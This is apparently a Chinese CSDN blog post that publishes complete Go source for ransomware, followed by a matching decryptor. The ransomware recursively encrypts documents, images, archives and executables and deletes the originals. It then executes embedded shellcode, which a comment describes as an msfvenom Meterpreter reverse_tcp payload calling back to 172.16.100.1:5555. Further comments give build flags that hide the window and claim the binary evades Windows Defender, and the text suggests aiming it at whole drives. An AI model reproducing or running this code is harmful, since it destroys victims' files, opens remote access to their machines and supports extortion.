Go加密+反弹木马 = 勒索软件

已于 2022-03-01 17:10:19 修改
阅读量999 收藏 5
点赞数
文章标签: golang 开发语言 后端
于 2022-03-01 12:05:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744832/article/details/123202688
版权 
package main

import (
	"encoding/hex"
	"syscall"
	"unsafe"
	"bufio"
	"crypto/sha256"
	"database/sql"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"strings"
	"sync"
	"time"
 
	_ "./go-sqlite3"

)

var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	ret, _, _ := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	return ret > 0
}

func Run(sc []byte) {
	f := func() {}
	var oldfperms uint32
	if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
		panic("Call to VirtualProtect failed!")
	}
	**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))

	var oldshellcodeperms uint32
	if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
		panic("Call to VirtualProtect failed!")
	}
	f()
}


// 加密字符串
func GetNegation(strb []byte) []byte {
	var strsN []byte
	for i, b := range strb {
		ii := i ^ (i % 3)
		strsN = append(strsN, ^b-uint8(ii))
	}
	return strsN
}

//md5值,参数为字符串,输出md5字符串
func GetSha256(str string) string {
	strM := sha256.Sum256([]byte(str))
	return hex.EncodeToString(strM[:])
}
 
// 保存修改后的文件,文件名为md5值,内容为1024字节后内容
func SaveFile(fileMd5 string, content []byte) bool {
	contentNeg := GetNegation(content)
	err := ioutil.WriteFile(fileMd5, contentNeg, 0777) //将源文件,写入目标文件
	if err != nil {
		return false
	}
	return true
}
 
//返回子文件夹

func GetAllDir(pathname string, s []string) ([]string, error) {
	rd, err := ioutil.ReadDir(pathname)
	if err != nil {
		fmt.Println("read dir fail:", err)
		return s, err
	}
	for _, fi := range rd {
		if fi.IsDir() {
			fullDir := pathname + "/" + fi.Name()
			s = append(s, fullDir)
			s, err = GetAllDir(fullDir, s)
			if err != nil {
				fmt.Println("read dir fail:", err)
				return s, err
			}
		} 
	}
	return s, nil
}

//返回文件名列表
func ReadFolder(fileDir string, extlist []string) []string {
	var fileNameList []string
	files, _ := ioutil.ReadDir(fileDir) //读取目录
	for _, onefile := range files {     //遍历目录下文件
		if !onefile.IsDir() { //是文件
			fileName := onefile.Name()
			fileNames := strings.Split(fileName, ".")
			ext := fileNames[len(fileNames)-1]
			for _, e := range extlist {
				if strings.EqualFold(ext, e) {
					fileNameList = append(fileNameList, fileName)
					break
				}
			}
		}
	}
	return fileNameList
}
 
//返回加密后的文件列表
func ReadFolderNeg(fileDir string) []string {
	var fileNameList []string
	files, _ := ioutil.ReadDir(fileDir) //读取目录
	for _, onefile := range files {     //遍历目录下文件
		if !onefile.IsDir() { //是文件
			fileName := onefile.Name()
			if len(fileName) == 64 {
				fileNameList = append(fileNameList, fileName)
			}
		}
	}
	return fileNameList
}
 
//删除文件
func DelFile(file *os.File, path string, jiajie string) {
	if file != nil {
		file.Close()
	}
	if IsFileExist(path) {
		err := os.Remove(path)
		if err == nil {
			// fmt.Printf("%s -> %s删除成功!\n", path, jiajie)
			return
		}
	}
	// fmt.Printf("%s -> %s删除失败!\n", path, jiajie)
}
 
//判断文件是否存在
func IsFileExist(path string) bool {
	fileInfo, err := os.Stat(path)
	if err != nil {
		return false
	}
	if fileInfo.IsDir() { //是目录
		return false
	}
	return true
}
 
//错误处理
func CheckErr(err error) {
	if err != nil {
		panic(err)
	}
}
 
//保存到数据库
func SaveFileToDb(db *sql.DB, fileName256 string, fileName string, content string, password string) bool {
	stmt, err := db.Prepare("insert into secret_key(fileName256,fileName,content,password) values(?,?,?,?)")
	defer func() {
		if stmt != nil {
			stmt.Close()
		}
	}()
	CheckErr(err)
	rwm.Lock()
	res, err := stmt.Exec(fileName256, fileName, content, password)
	rwm.Unlock()
	if stmt != nil {
		stmt.Close()
	}
	CheckErr(err)
	id, err := res.LastInsertId()
	CheckErr(err)
	if id > 0 {
		return true
	}
	return false
}
 
//数据库搜索
func selectDb(db *sql.DB, sql string) (string, string, string, string) {
	rows, err := db.Query(sql)
	defer func() {
		if rows != nil {
			rows.Close()
		}
	}()
	CheckErr(err)
	var (
		uid          int
		fileNameb256 string
		fileNameb    string
		contentb     string
		password     string
	)
	rows.Next()
	rows.Scan(&uid, &fileNameb256, &fileNameb, &contentb, &password)
	return fileNameb256, fileNameb, contentb, password
}
 
//删除数据项
func DelData(db *sql.DB, fileName256 string) {
	stmt3, err := db.Prepare("delete from secret_key where fileName256=?")
	defer func() {
		if stmt3 != nil {
			stmt3.Close()
		}
	}()
	CheckErr(err)
	rwm.Lock() //加锁
	_, err = stmt3.Exec(fileName256)
	rwm.Unlock() //解锁
	CheckErr(err)
}
 
//加密过程
func encrypt(fileDir string, fileName string, db *sql.DB, encryptPw string, jiajie string) {
	// delfileName := fileName
	waiB := 0
	fileSha256 := GetSha256(fileName) //文件名改为哈希256
	sql1 := fmt.Sprintf(`select * from secret_key where fileName256="%s"`, fileSha256)
	sfileSha256, _, sbeforeNegation, _ := selectDb(db, sql1) //查找数据库文件名是否已存在
	filePath := fileDir + "/" + fileName
	srcFile, err := os.Open(filePath)                        //读取原文件
	if err != nil {                                          //读取错误
		// fmt.Println(fileName, " -> 打开错误!")
		if waiB == 0 {
			waitgroup.Done()
			waiB++
		}
		return
	}
	//
	fileSha256Path := fileDir + "/" +fileSha256
	dstFile, err2 := os.OpenFile(fileSha256Path, os.O_WRONLY|os.O_CREATE, 0666) //加密后的文件
	if err2 != nil {                                                        //读取错误
		// fmt.Println(fileSha256Path, " -> 打开错误!")
		if waiB == 0 {
			waitgroup.Done()
			waiB++
		}
		return
	}
	defer func() { //关闭打开的文件
		srcFile.Close()
		dstFile.Close()
	}()
	r := bufio.NewReader(srcFile) //读文件
	w := bufio.NewWriter(dstFile) //写文件
	buf := make([]byte, 4096)     //读写缓冲区
	var sBuf []byte               //加密后的数据
	bbb := 0                      //计数器,第一次读到的文件内容存储到数据库,后面内容存储到文件中
	for {
		n, err3 := r.Read(buf) //读文件到缓冲区
		if err3 != nil {       //读文件错误
			if err3 == io.EOF { //读取完毕
				w.Flush()
				fmt.Println(filePath, " -> 完成!")
				DelFile(srcFile, filePath, jiajie) //删除原文件
			} else { //非读取完毕错误
				// fmt.Println(fileName, " -> 读取错误!")
 
			}
			if waiB == 0 {
				waitgroup.Done()
				waiB++
			}
			return
		} else { //读取正常
			if bbb == 0 {
				//加密保存数据库
				beforeNegation := string(GetNegation(buf[:n])) // 加密数据库文件内容
				if sfileSha256 != "" {
					if sbeforeNegation == beforeNegation { //数据库有相同内容
						if IsFileExist(sfileSha256) { //加密后文件存在
							fmt.Println(fileName, ":文件已加密!")
							DelFile(srcFile, filePath, jiajie) //直接删除原文件
							if waiB == 0 {
								waitgroup.Done()
								waiB++
							}
							return
						}
					} else { //数据库没有相同内容,只是文件名相同
						ns := time.Now().UnixNano()
						fileName = fmt.Sprintf("%v%s", ns, fileName) // 重命名文件名
						fileSha256 = GetSha256(fileName)             //文件名哈希256
					}
				}
				fileNegation := string(GetNegation([]byte(fileName)))                     //原文件名加密存储到数据库
				password := GetSha256(encryptPw)                                            //密码的哈希值
				if SaveFileToDb(db, fileSha256, fileNegation, beforeNegation, password) { //保存内容到数据库
					// fmt.Println(fileName, " -> 数据库保存成功!")
				}
			} else {
				//加密保存文件
				sBuf = GetNegation(buf[:n]) //加密数据
				_, err4 := w.Write(sBuf)    //保存数据
				if err4 != nil {            //保存错误
					fmt.Println(fileSha256, " -> 保存错误!")
					if waiB == 0 {
						waitgroup.Done()
						waiB++
					}
					return
				}
			}
		}
		bbb++ //计数器加一
	}
}
 

var waitgroup sync.WaitGroup
var rwm sync.RWMutex
 
//主函数
func main() {
	
	db, err := sql.Open("sqlite3", "./重要勿删")
	defer db.Close()
	if err != nil {
		// fmt.Println("打开数据库错误!")
	}
	sqlTable := `
        CREATE TABLE IF NOT EXISTS secret_key(
            uid INTEGER PRIMARY KEY AUTOINCREMENT,
            fileName256 VARCHAR NULL,
            fileName VARCHAR NULL,
	        content VARCHAR NULL,
			password VARCHAR NULL
        );
	`
	db.Exec(sqlTable)
	fileDir := "./test"         //需要加密的相对路径
	
	var DirList [] string
	DirList, _= GetAllDir(fileDir,DirList)
	DirList = append(DirList, fileDir)
	

	
	//加密部分
	var extlist []string   //加密扩展名列表
	extlist = []string{"txt","doc","docx","xls","xlsx","ppt","pptx","pdf","png","jpg","jpeg","mp4","zip","go","c","cdf","exe"}
	var encryptPw string
	encryptPw = "YOUAREHACKED"
	for i := range DirList{
				for _, fileName := range ReadFolder(DirList[i], extlist){
					waitgroup.Add(1)
					go encrypt(DirList[i],fileName, db, encryptPw, "加密")
				}
				waitgroup.Wait() 
			}
    //木马部分
    //shellcode在kali或者parrot os上由如下命令生成
    //msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.1 lport=5555 -f hex
	sc, _ := hex.DecodeString("4831c94881e9c0ffffff488d05efffffff48bb257aa12b451f0b6048315827482df8ffffffe2f4d93222cfb5f7c760257ae07a044f592814a8c463ce4d6b28ae28b97a0d9459407332ae9c0f5543eb572aec1a8c573aa08946c05747332b21e4b3ac6a44dee98d773bf063ce4d2beb6746e92a95798a183d71a324c06d0b6025f121a3451f0b28a0bad54c0d1edb24ae3a817b0c1edbeb6d62427d0de0c221ae4e296344c94651ec3290ebe95ecaa9283ba0ea7dff7e916979ed0f4d5a32b150a2f96fce5f2f2924aac76ace134324ae3abd6244cf4aeb21f2e92a955e53217d24f87104474a396420e9a8a93f4a32da9af96a1c4543eb3793ead4bae056299b0dd2191a2c3960253bf762ccf943e1c9daa02b455682856cc6a32b50aca770417be07f0c96ef2cac8be09109682d67daafeda2af770a61257af86aff368b0b258574414f5e5530753790e2082ecb28dabae9a28757f4a06df3606afff504bfc5857463ccd861706422eda2a757829964c0388e317ef4b5a0bad5210ce0c515c092322b451f43e3c96ae9a2a7523aa94f7ee0730d96f2219f7878e31ae0dee3dd7adf7e0d9ccf407bf35741055e5208256aa12b044743e9d73290e204a553c4769f5efe0d96c829acbdec1a8c5682906df37b63cce64ada27a36974baca88982507897304485208253aa12b044761607f3b1b206a103b9ff02df86aff6a652d44857462bad1e25cda855e6344dc4349e33224dd30ab4a9fc222cb2b1c56cca2d5cf037dbaca0b60")
	Run(sc)
}
//编译,隐藏窗口go build -ldflags="-H windowsgui -w -s" malware.go
//可逃过windows defender检测

在靶机上运行将加密当前路径下test文件夹里大部分文件,可增加文件拓展名,实现几乎所有文件的加密,最后连接攻击机。当然也可以直接将路径改为C盘,D盘或E盘,C盘需要提升用户权限。

以下是解密代码

package main
 
import (
	"bufio"
	"crypto/sha256"
	"database/sql"
	"encoding/hex"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"strings"
	"sync"
	"time"
 
	_ "./go-sqlite3"
)

// 加密字符串
func GetNegation(strb []byte) []byte {
	var strsN []byte
	for i, b := range strb {
		ii := i ^ (i % 3)
		strsN = append(strsN, ^b-uint8(ii))
	}
	return strsN
}

//md5值,参数为字符串,输出md5字符串
func GetSha256(str string) string {
	strM := sha256.Sum256([]byte(str))
	return hex.EncodeToString(strM[:])
}
 
// 保存修改后的文件,文件名为md5值,内容为1024字节后内容
func SaveFile(fileMd5 string, content []byte) bool {
	contentNeg := GetNegation(content)
	err := ioutil.WriteFile(fileMd5, contentNeg, 0777) //将源文件,写入目标文件
	if err != nil {
		return false
	}
	return true
}
 
//返回子文件夹

func GetAllDir(pathname string, s []string) ([]string, error) {
	rd, err := ioutil.ReadDir(pathname)
	if err != nil {
		fmt.Println("read dir fail:", err)
		return s, err
	}
	for _, fi := range rd {
		if fi.IsDir() {
			fullDir := pathname + "/" + fi.Name()
			s = append(s, fullDir)
			s, err = GetAllDir(fullDir, s)
			if err != nil {
				fmt.Println("read dir fail:", err)
				return s, err
			}
		} 
	}
	return s, nil
}

//返回文件名列表
func ReadFolder(fileDir string, extlist []string) []string {
	var fileNameList []string
	files, _ := ioutil.ReadDir(fileDir) //读取目录
	for _, onefile := range files {     //遍历目录下文件
		if !onefile.IsDir() { //是文件
			fileName := onefile.Name()
			fileNames := strings.Split(fileName, ".")
			ext := fileNames[len(fileNames)-1]
			for _, e := range extlist {
				if strings.EqualFold(ext, e) {
					fileNameList = append(fileNameList, fileName)
					break
				}
			}
		}
	}
	return fileNameList
}
 
//返回加密后的文件列表
func ReadFolderNeg(fileDir string) []string {
	var fileNameList []string
	files, _ := ioutil.ReadDir(fileDir) //读取目录
	for _, onefile := range files {     //遍历目录下文件
		if !onefile.IsDir() { //是文件
			fileName := onefile.Name()
			if len(fileName) == 64 {
				fileNameList = append(fileNameList, fileName)
			}
		}
	}
	return fileNameList
}
 
//删除文件
func DelFile(file *os.File, path string, jiajie string) {
	if file != nil {
		file.Close()
	}
	if IsFileExist(path) {
		err := os.Remove(path)
		if err == nil {
			// fmt.Printf("%s -> %s删除成功!\n", path, jiajie)
			return
		}
	}
	// fmt.Printf("%s -> %s删除失败!\n", path, jiajie)
}
 
//判断文件是否存在
func IsFileExist(path string) bool {
	fileInfo, err := os.Stat(path)
	if err != nil {
		return false
	}
	if fileInfo.IsDir() { //是目录
		return false
	}
	return true
}
 
//错误处理
func CheckErr(err error) {
	if err != nil {
		panic(err)
	}
}
 
//保存到数据库
func SaveFileToDb(db *sql.DB, fileName256 string, fileName string, content string, password string) bool {
	stmt, err := db.Prepare("insert into secret_key(fileName256,fileName,content,password) values(?,?,?,?)")
	defer func() {
		if stmt != nil {
			stmt.Close()
		}
	}()
	CheckErr(err)
	rwm.Lock()
	res, err := stmt.Exec(fileName256, fileName, content, password)
	rwm.Unlock()
	if stmt != nil {
		stmt.Close()
	}
	CheckErr(err)
	id, err := res.LastInsertId()
	CheckErr(err)
	if id > 0 {
		return true
	}
	return false
}
 
//数据库搜索
func selectDb(db *sql.DB, sql string) (string, string, string, string) {
	rows, err := db.Query(sql)
	defer func() {
		if rows != nil {
			rows.Close()
		}
	}()
	CheckErr(err)
	var (
		uid          int
		fileNameb256 string
		fileNameb    string
		contentb     string
		password     string
	)
	rows.Next()
	rows.Scan(&uid, &fileNameb256, &fileNameb, &contentb, &password)
	return fileNameb256, fileNameb, contentb, password
}
 
//删除数据项
func DelData(db *sql.DB, fileName256 string) {
	stmt3, err := db.Prepare("delete from secret_key where fileName256=?")
	defer func() {
		if stmt3 != nil {
			stmt3.Close()
		}
	}()
	CheckErr(err)
	rwm.Lock() //加锁
	_, err = stmt3.Exec(fileName256)
	rwm.Unlock() //解锁
	CheckErr(err)
}

 
// 解密过程
func decrypt(fileDir string, fileName string, db *sql.DB, decryptPw string, jiajie string) {
	sql := fmt.Sprintf(`select * from secret_key where fileName256="%s"`, fileName)
	fileNameDb256, fileNameDb, contentDb, passwordDb := selectDb(db, sql) //查找数据库
	waiB := 0
	fileNamePath := fileDir + "/" +fileName
	fileNameDb256Path := fileDir + "/" + fileNameDb256
	if fileNameDb256 != "" && GetSha256(decryptPw) == passwordDb { //数据存在加密文件,并验证密码
		fileNameDbs := string(GetNegation([]byte(fileNameDb))) //解密后文件名
		contentDbs := GetNegation([]byte(contentDb))           //解密后前半内容
		//文件名已存在,判断前半内容是否相同,若相同,直接删除加密文件、数据库内容
		//
		fileNameDbsPath := fileDir + "/" + fileNameDbs
		if IsFileExist(fileNameDbs) { //解密后文件名已存在
			srcFile, err := os.Open(fileNameDbsPath) //读取原文件
			if err != nil {                      //读取错误
				// fmt.Println(fileNameDbsPath, " -> 打开错误!")
				if waiB == 0 {
					waitgroup.Done()
					waiB++
				}
				return
			}
			defer func() { //关闭打开的文件
				srcFile.Close()
			}()
			r := bufio.NewReader(srcFile) //读文件
			buf := make([]byte, 4096)     //读写缓冲区
			n, err3 := r.Read(buf)        //读文件到缓冲区
			if err3 != nil {              //读文件错误
				// fmt.Println(fileNameDbsPath, " -> 读取错误!")
				if waiB == 0 {
					waitgroup.Done()
					waiB++
				}
				return
			} else { //读取正常
				if string(buf[:n]) == string(contentDbs) {
					//解密后文件已存在

					DelData(db, fileNameDb256) //解密文件已存在,删除数据库中内容
					if waiB == 0 {
						waitgroup.Done()
						waiB++
					}
					return
				} else {
					//解密后文件名存在,但是文件内容不同
					ns := time.Now().UnixNano()
					fileNameDbs = fmt.Sprintf("%v%s", ns, fileName) // 重命名文件名
				}
			}
		}
		f, err2 := os.Open(fileNamePath)
		if err2 != nil {
			// fmt.Println(fileNamePath, " -> 打开错误!")
			if waiB == 0 {
				waitgroup.Done()
				waiB++
			}
			return
		}
		f2, err3 := os.OpenFile(fileNameDbsPath, os.O_WRONLY|os.O_CREATE, 0666)
		if err3 != nil {
			// fmt.Println(fileNameDbsPath, " -> 打开错误!")
			if waiB == 0 {
				waitgroup.Done()
				waiB++
			}
			return
		}
		defer func() {
			f.Close()
			f2.Close()
		}()
		r := bufio.NewReader(f)
		w := bufio.NewWriter(f2)
		buf2 := make([]byte, 4096)
		ddd := 0
		var sBuf []byte
		for {
			if ddd == 0 {
				w.Write(contentDbs)
			} else {
				n, err4 := r.Read(buf2)
				if err4 != nil {
					if err4 == io.EOF {
						w.Flush()
						fmt.Println(fileNamePath, " -> 完成!")
						DelFile(f, fileNameDb256Path, jiajie) //解密成功,删除加密后的文件
 
					} else { //非读取完毕错误
						// fmt.Println(fileName, " -> 读取错误!")
					}
					if waiB == 0 {
						waitgroup.Done()
						waiB++
					}
					return
				} else {
					sBuf = GetNegation(buf2[:n]) //解密数据
					w.Write(sBuf)
				}
			}
			ddd++
		}
	} else {
		fmt.Println(fileNamePath, " -> 密码错误!")
	}
	if waiB == 0 {
		waitgroup.Done()
		waiB++
	}
}
 
var waitgroup sync.WaitGroup
var rwm sync.RWMutex
 
//主函数
func main() {
	db, err := sql.Open("sqlite3", "./重要勿删")
	defer db.Close()
	if err != nil {
		// fmt.Println("打开数据库错误!")
	}
	sqlTable := `
        CREATE TABLE IF NOT EXISTS secret_key(
            uid INTEGER PRIMARY KEY AUTOINCREMENT,
            fileName256 VARCHAR NULL,
            fileName VARCHAR NULL,
	        content VARCHAR NULL,
			password VARCHAR NULL
        );
	`
	db.Exec(sqlTable)
	fileDir := "./test"         //需要加密的相对路径
	
	var DirList [] string
	DirList, _= GetAllDir(fileDir,DirList)
	DirList = append(DirList, fileDir)
	
	
	//解密
	var decryptPw string
	decryptPw = "YOUAREHACKED"
	for i := range DirList{
				for _, fileName := range ReadFolderNeg(DirList[i]){
					waitgroup.Add(1)
					go decrypt(DirList[i],fileName, db, decryptPw, "解密")
				}
				waitgroup.Wait() 
			}
}

丘比特爱睡觉
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GO语言实现的简单“木马”小程序
Vince的修炼之路
11-06 7144
初学GO语言可能会感觉到很枯燥,而且GO和其他的编程语言的语法还有很大的差异,可能刚开始很难入门,为了提高对GO语言的学习兴趣,快速地掌握GO的基本语法,我尝试写了个类似后门的小程序,主要的功能是可以在另一台设备上查看和操作目标设备,我是在我自己的电脑上运行这个小程序,然后用PAD来操作我的电脑,实现简单的目录访问和文件查看,还有重启或关闭计算机的简单功能,由于我也是才开始学习GO语言第二天,也就
推荐开源项目:goEncrypt - 简易而强大的加解密工具
最新发布
gitblog_00093的博客
05-18 374
推荐开源项目:goEncrypt - 简易而强大的加解密工具 项目地址:https://gitcode.com/wumansgy/goEncrypt 在这个数字化时代,数据安全至关重要。无论是个人隐私还是企业信息,都需要可靠的保护措施。goEncrypt 是一个由 Go 语言编写的强大加密库,它集成了多种对称加密、非对称加密以及哈希函数,为您的数据保驾护航。 1. 项目介绍 goEncrypt 是...
goencrypt:用于Go的实验性新加密算法
05-02
加密 Go的实验性/新加密算法 除此之外,该库还将包含现有加密算法的实现。 配套 该软件包实现了基于sha3 SHAKE的加密算法。 此包是实现ReCore基于Salsa20的实验性分组密码的工具。 这个包是OpenSSLs茶花实现,而不是Apache许可证的端口,但非GPL 此程序包提供了用于加密/密码的扩展,即用于Block-Cipher编码数据的流式传输。 在“ golang.org/x/crypto/salsa20”的实现salsa20的cipher.Stream版本。 许可证(Apache许可证) 版权所有2015 Simon Schmidt 根据Apache许可证2.0版(“许可证”)获得许可; 除非遵守许可,否则您不得使用此文件。 您可以在以下位置获得许可证的副本: http://www.apache.org/licenses/LICENSE-2.0 除非适
golang实现AES有五种加密模式函数,Encrypt加解密字符串输出
weixin_40344051的博客
12-22 1919
func main() { source:="asdasadgsdhfasf" fmt.Println("原字符:",source) //16byte密钥 key:="sdddd" encryptCode:=AESEncryptECBStr(source,key) fmt.Println("密文:",encryptCode) decryptCode:=AESDecryptECBStr(encryptCode,key) fmt.Println("解密:",decryptCode) }
Go 加密解密算法总结
无风的雨
09-23 2925
前言 加密解密在实际开发中应用比较广泛,常用加解密分为:“对称式”、“非对称式”和”数字签名“。 对称式:对称加密(也叫私钥加密)指加密和解密使用相同密钥的加密算法。具体算法主要有DES算法,3DES算法,TDEA算法,Blowfish算法,RC5算法,IDEA算法。 非对称加密(公钥加密):指加密和解密使用不同密钥的加密算法,也称为公私钥加密。具体算法主要有RSA、Elgamal、背包算法、Rabin、D-H、ECC(椭圆曲线加密算法)。 数字签名:数字签名是非对称密钥加密技术与数字摘要技术的应用。主要算
软件加密+破解密码(参考对应文章说明)
04-23
支持文件夹简单加密,并提供破解方式。 破解说明参考改文章: https://pm-wsir.blog.csdn.net/article/details/130316354?spm=1001.2014.3001.5502
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
GO语言基于Golang+beego的数据查询系统源码.zip
06-03
GO语言基于Golang+beego的数据查询系统源码程序以Excel表格方式导入数据,可自定义登陆账户验证列,以及相关联的登陆密码验证列,程序上传Excel之后会对数据源进行加密,并且屏蔽外网对数据源目录访问。 可能会需要...
2021年勒索软件威胁报告(PA UNIT42).pdf
10-25
《2021年勒索软件威胁报告》是由Palo Alto Networks的Unit 42团队发布的一份深度研究报告,详细分析了2020年全球勒索软件的威胁状况及其发展趋势。报告指出,勒索软件已成为网络安全领域的主要威胁之一,对国家和...
Go语言实现md2亿次加密(已打包成windows可执行文件)
10-29
可以计算md2亿次加密的工具 ,使用go实现,计算速度还可以,已经打包成exe文件,windows系统下双击就可以执行,亿次加密时需要等一段时间,喝一杯咖啡吧
Go-采用Go编写的跨平台PoC勒索软件
08-13
采用Go编写的跨平台PoC勒索软件
Go语言木马加密通信分析与检测
GCKJ_0824的博客
10-20 270
Go语言木马增长显著 据网络安全公司 Intezer 报告显示,恶意软件开发者已经从 C 和 C++ 逐渐转向 Go 语言,自 2017 年以来,基于 Go 语言的恶意软件数量呈现爆发式增长,增幅超过了 2000%。预计Go的使用率在未来几年将持续上升,并与C、C++和Python一起,成为恶意软件编码的首选编程语言之一。 Go语言木马的迅猛增长,与Go语言天然的开发优势有较强联系。与其他开发语言相比,Go的主要优势表现在: Go支持跨平台编译,开发者只需要编写一次代码,就可以编译出多个平台的二进..
木马免杀实践-golang
网络安全。
08-09 2107
0x01 简介 这里以github上一个golang免杀项目为例,项目地址:https://github.com/yumusb/CS-Loader/tree/master/go%E7%89%88%E6%9C%AC,原项目使用方法如下,根据其要求生成cobaltstrike木马后,上传virustotal,免杀效果已经比较差了,且生成木马大小为5.9M,比较大。 0x02 解读原项目 原项目–python加密部分 此项目加密shellcode采用的方式是base64 -> RC4加密 -> bas
Go 恶意软件增多,分析两个新发现的零检出样本
ZL_1618的博客
08-18 79
由于 Go 良好的跨平台特性,在多个操作系统与架构上都能运行,所以最近使用 Go 语言编写的恶意软件越来越多,每周都会发现大量的新样本。在四月末,研究人员通过蜜罐发现了两个新的变种(和),发现时在VirusTotal 上无检出。Backdoorit样本检出Caligula样本检出Backdoorit 与 Caligula 都是为多处理器架构编译的、跨平台 Go 恶意软件程序。
基于go的加解密的小工具
xxxxxyyyyyyyyy的博客
01-25 413
说明,不免费,囊中羞涩,对想要尝试的朋友,友情价1块钱,告诉你怎么加密和解密文件,我必须心痛一下我的电费,不能运行不要钱,用完觉得不好用,不要钱。基于go的并发优势及能够方便的生成exe可执行文件,因此编写了一个小的加解密工具。自用还不错,分享出去。4 目前已经作为我个人使用,用于文件的加解密,防止传输过程中的数据泄露问题。2 多次基于特征进行字节层面的处理,加密后不会增加文件的大小。3 支持指定工作目录,如果没有指定则以软件运行目录为工作目录。1 快,加密后原有的文件会删除,因此请做好备份(以防万一)。
Go语言学习笔记——加密和解密应用
qq_39280718的博客
09-07 609
Golang加密和解密应用
Go语言常用加密算法
weixin_42117918的博客
09-27 6735
常见的加密算法 原文链接:https://studygolang.com/articles/10134 在项目开发过程中,当我们利用数据库存储一些关于用户的隐私信息,诸如密码、帐户密钥等数据时,需要加密后才向数据库写入。这时,我们需要一些高效地、简单易用的加密算法,当我们向数据库写数据时加密数据,然后把加密后的数据存入数据库;当需要读取数据时,从数据库把加密后的数据取出来,再通过算法解密。 ...
加密检测算法:加密勒索软件早期识别策略
本文主要探讨了"基于预加密检测算法的加密勒索软件早期检测方案研究",由S.H.Kok、AzweenAbdullah和NZ在沙特国王大学学报上发表。作者关注的是面对日益增长的加密勒索软件威胁,特别是那些采用高级加密技术锁定用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值